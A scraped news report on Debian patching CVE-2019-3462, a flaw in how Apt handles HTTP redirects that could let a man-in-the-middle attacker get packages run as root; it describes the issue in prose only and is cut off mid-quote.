Click For Photo: https://regmedia.co.uk/2016/10/11/damaged_box.jpgThe Debian Project has patched a security flaw in its software manager Apt that can be exploited by miscreants to execute commands as root on victims' boxes as they update or install packages.
The Linux distro's curators have pushed out an fix to address CVE-2019-3462, a vulnerability uncovered and reported by researcher Max Justicz.
Flaw - Way - Apt - Handle - HTTP
The flaw is related to the way Apt and apt-get handle HTTP redirects when downloading packages. Apt fetches packages over plain-old HTTP, rather than a more secure HTTPS connection, and uses cryptographic signatures to check whether the downloaded contents are legit and haven't been tampered with.
This unfortunately means a man-in-the-middle (MITM) attacker who was able to intercept a victim's network connection could inject a redirect into the HTTP headers to change the URL used to fetch the package. And the hacker would be able to control the hashes used by Apt to check the downloaded package, passing the package manager legit values to masquerade the fetched malware as sanctioned software. All in all, users can be fed malware that's run as root during installation, allowing it to commandeer the machine.
Vulnerability - Apt
"I found a vulnerability in apt that allows...
Wake Up To Breaking News!
Hell sometimes looks an awful lot like an office cubicle.